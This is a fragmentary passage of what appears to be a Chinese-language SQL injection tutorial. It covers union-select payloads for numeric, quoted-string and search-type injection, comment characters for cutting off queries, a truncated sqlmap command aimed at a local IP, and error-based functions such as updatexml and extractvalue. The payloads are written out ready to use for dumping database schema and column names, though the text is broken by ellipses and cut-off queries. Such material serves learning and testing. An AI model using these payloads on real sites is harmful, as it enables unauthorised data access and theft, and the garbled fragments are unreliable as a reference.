where table_schema='testa' limit 0,1),database()
3、再利用表达式爆出列名:
id=-1 union select 1,(select column_name...字符型注入:
id=1' union select 1,2,3# // #和-- 都是屏蔽符,在url编码中#为%23,-- (此处有个空格)为--+
字符型除了单引号’之外,还有",’)等等方式...‘%$id%’
搜索型注入:
id=1%' union select 1,2,3#
sqlmap基础使用
需要环境
python2.7
用法
python2 sqlmap.py -u “http://...192.168.11.28/mysql/sqli.php?...updatexml()
extractvalue()
floor()
updatexml(1,2,3),是从一个xml文档里面寻找值并替换,1是寻找的目标,2是文档中的路径,3是用来替换的值。